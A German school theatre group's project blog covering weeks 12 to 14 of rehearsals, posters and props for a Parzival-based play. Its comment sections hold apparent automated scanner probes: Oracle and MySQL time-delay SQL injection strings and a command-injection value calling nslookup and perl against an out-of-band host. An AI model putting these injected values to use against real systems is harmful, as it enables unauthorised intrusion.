Projekt-Log (2)

Woche 12: Neujahrsvorsätze und -pläne

07.01.2019

Neues Jahr, neues Glück. Deswegen ließen wir es uns nicht nehmen, gleich weiter zu machen, wo wir im Dezember aufgehört hatten. Zuerst die große Programmheftdebatte. Was muss geändert werden, was fehlt, woran haben wir bisher noch nicht gedacht und so weiter. Dann in medias res. Brauchen wir eine Begrüßung? Wenn ja, was muss man da überhaupt sagen? Was uns schnell zum Schluss gebracht hat, dass wir wohl von einem Publikum, das ein Theaterstück besucht, verlangen kann, dass es weiß, wie das Stück heißt. Und wer wir sind, ist schließlich in Blog und Programmheft nachzulesen, weswegen die ganze Begrüßungskiste ziemlich schnell gestorben war. Danach weiter zum Technischen. Wie hoch muss der Stamm für Sigunes Baum sein und warum ist sie die einzige, die ein mittelalterliches Kleid anhaben muss? Antworten: ca. 1,5 Meter und muss sie eigentlich wirklich nicht. Die Raumbesichtigung wieder zu einem Terminfindungskrimi zu machen, haben wir beschlossen zu umgehen, indem wir einfach unseren Kontakt entscheiden lassen, wann er Zeit hat und es soll dann einfach kommen, wer kommen kann. Auch wie wir das mit der Akustik lösen sollen werden wir dann wohl vor Ort am besten herausfinden.  Requisitenprobleme wurden ausgelotet und teilweise beseitigt, wenngleich ich bei einigen Figuren immer noch nicht weiß, was sie dann im Endeffekt anhaben werden, aber das hat unser Regieteam dafür sehr gut im Blick. Und dann das, wovor ich mich schon etwas gefürchtet hatte, da meine liebe Eva aufgrund der Schneeverhältnisse in Wörgl feststeckte und mir nicht beistehen konnte. Die große Plakatsdiskussion. Was haben wir uns bisher überlegt? Einige Vorschläge, inklusive dem von Skizze Eins. (Die anderen habe ich mich nicht getraut zu skizzieren, weil meine Autos immer etwas von Dosen haben.) Dann sind die Vorschläge nur so auf mich eingeprasselt. Ein Handy mit Chatverlauf und diverse andere Möglichkeiten, Vergangenheit und Gegenwart zu verbinden (siehe Skizze Drei und Vier: verschiedene Schriften auf verschiedenen Untergründen). Nachdem ich dann etwas geplättet meine Notizen weglegen durfte, gab es noch ein paar kleine Kostproben der wunderbaren schauspielerischen Leistungen von Nadia und Sabrina und dann war unsere Einheit schon wieder vorbei.

Mein Gekritzel zu den Plakatentwürfen.


Comments: 11
  • #11

    kXvrbKwH (Monday, 22 November 2021 07:26)

    20

  • #10

    kXvrbKwH (Monday, 22 November 2021 07:07)

    20

  • #9

    kXvrbKwH (Monday, 22 November 2021 07:07)

    20

  • #8

    kXvrbKwH'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' (Monday, 22 November 2021 07:06)

    20

  • #7

    kXvrbKwH (Monday, 22 November 2021)

    20

  • #6

    kXvrbKwH (Monday, 22 November 2021 07:05)

    20

  • #5

    kXvrbKwH (Monday, 22 November 2021 07:03)

    20

  • #4

    asdzxcqwe (Monday, 15 February 2021 19:38)

    asdzxcqwe

  • #3

    asdzxcqwe (Monday, 15 February 2021 19:38)

    asdzxcqwe

  • #2

    asdzxcqwe (Monday, 15 February 2021 19:37)

    asdzxcqwe

  • #1

    asdzxcqwe (Monday, 15 February 2021 19:36)

    asdzxcqwe


Woche 13: Proben, Proben, Proben

14.01.2019

Ein weiteres szenisches Bild von unseren Requisiten.

Wir sind mittlerweile an einem Punkt in unserem Prozess angekommen, an dem es mir ehrlich gesagt schwer fällt, von unserem Vorankommen zu berichten, ohne dass ich zu viel verrate. Aber ich werde es trotzdem versuchen.

Zu Anfang der letzten Einheit gab es wie gehabt eine Requisitenrunde. Aber da sie inhaltlich sehr nah an allem bisher Passierten und von mir hier Wiedergegebenen dran ist, werde ich mich so knapp wie möglich fassen:

“Hat jede, was sie braucht?” “Ja” (fast alle) “Nein, ich brauche noch…” (einige wenige)

Und nachdem wir nochmal darüber diskutiert haben, was unser Wolfram jetzt denn tragen soll, hatte sich das auch schon wieder erledigt.

Dann zu einem etwas substantielleren Thema. Wann können wir in den Ferien proben und wie viele Proben brauchen wir noch? Aber da man sowas schlecht im Voraus planen kann, hat Frau Strieder beschlossen, uns schon vorsorglich einen Raum für die fragliche Zeit zu reservieren.

Der nächste Themenschwerpunkt war eine kleine Beleuchtung unseres Stückes auf einer etwas tieferen Ebene. Bei der Diskussion, was der Erzähler denn in seinem Schlussplädoyer sagen soll, wurde ziemlich schnell klar, dass die einzelnen Szenen sich alle im Grunde genommen um ein und denselben Themenkreis drehen. Was der Endrede natürlich gleich eine relativ genaue Richtung gab.

Ob der Anfang jetzt endgültig an die Regie oder den Erzähler gehen soll, wurde auch entschieden.

Danach kam dann das, worüber ich so schwer erzählen kann. Die Proben. Es wurde übergegangen von den einfachen Textproben zu “Wie steht die Figur, oder sitzt sie?”, “Wie soll man das sagen?”, “Klingt das alles kohärent?” und so weiter. Und nachdem wir Wolfram, Jeschute, Artus, Gurnemanz und Condwiramurs bei ihren (Selbst-)Gesprächen zugesehen hatten, war die Einheit auch schon aus.

Nicht aber die Arbeit. Die ging nämlich für einen Teil von uns noch weiter. Was wir aber gemacht haben, außer dem gesamten neunten Stock zu sagen, dass man sich auf leisen Sohlen bewegen muss, soll dann doch ein Geheimnis bleiben.


Comments: 8
  • #8

    kXvrbKwH (Monday, 22 November 2021 07:26)

    20

  • #7

    kXvrbKwH (Monday, 22 November 2021 07:08)

    20

  • #6

    kXvrbKwH (Monday, 22 November 2021 07:07)

    20

  • #5

    @@T7nPz (Monday, 22 November 2021 07:06)

    20

  • #4

    kXvrbKwH (Monday, 22 November 2021 07:06)

    20

  • #3

    kXvrbKwH (Monday, 22 November 2021 07:06)

    20

  • #2

    kXvrbKwH (Monday, 22 November 2021 07:05)

    20

  • #1

    kXvrbKwH (Monday, 22 November 2021 07:03)

    20


Woche 14: Proben, Proben, Proben, die Zweite

21.01.2018

Da die Proben jetzt losgegangen sind, haben sich unsere Einheiten etwas intensiviert. Auch wenn wir dieses Mal wieder die große “Was kommt wann?”-Frage durchgekaut haben, hatten wir doch schnell den Weg zurück zu den Szenen selbst gefunden. Und so gaben wir zuerst Sigune, dann Jeschute unseren Senf zu ihren Monologen über Liebe und was sie mit einem machen kann. Dann durften wir Artus beobachten, wie er Cundries Wutanfall über sich ergehen lässt und wir stellten fest, dass wir da wohl oder übel Sekt brauchen werden. Dann kam Trevrizent an die Reihe, den jetzt nach einigem Hin und Her Frau Strieder übernommen hat. Und es war gleich klar, dass unser Aussteiger aus der Politik unbedingt jemanden braucht, mit dem er sich unterhalten kann. Und was bietet sich da besser an, als Topfpflanzen? Zumal Frau Strieder das wohl aus dem einen oder anderen morgendlichen Kurs kennt, wo man als Student auch oft viel von einem Gummibaum hat. Dann wieder Cundrie und mit ihr Sigune, wobei erstere hier sehr an eine Helikopter-Mum erinnert. Die Performance von Feirefiz danach hat uns wohl alle ziemlich aus den Socken gehaut und wir hoffen, dass es auch unserem Publikum so gehen wird. Den Abschluss machte unsere Cunneware mit einer flammenden Rede zu #metoo.

Am Freitag waren einige von uns auch noch in der Stadtbibliothek in mehr oder minder geheimer Mission am weg, wobei auch die Bilder hier entstanden sind.

Schaut so aus, als ob Mirjam und Lisa zufrieden wären.

Und hier der Saal in seiner vollen Schönheit.


Comments: 11
  • #11

    kXvrbKwH (Monday, 22 November 2021 07:26)

    20

  • #10

    kXvrbKwH (Monday, 22 November 2021 07:20)

    20

  • #9

    kXvrbKwH (Monday, 22 November 2021 07:20)

    20

  • #8

    if(now()=sysdate(),sleep(15),0) (Monday, 22 November 2021 07:19)

    20

  • #7

    kXvrbKwH (Monday, 22 November 2021 07:19)

    20

  • #6

    kXvrbKwH (Monday, 22 November 2021 07:18)

    20

  • #5

    kXvrbKwH (Monday, 22 November 2021 07:18)

    20'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  • #4

    |(nslookup hitjcjdaoiuhb69d08.bxss.me||perl -e "gethostbyname('hitjcjdaoiuhb69d08.bxss.me')") (Monday, 22 November 2021 07:17)

    20

  • #3

    kXvrbKwH (Monday, 22 November 2021 07:17)

    20

  • #2

    kXvrbKwH (Monday, 22 November 2021 07:17)

    20

  • #1

    kXvrbKwH (Monday, 22 November 2021 07:03)

    20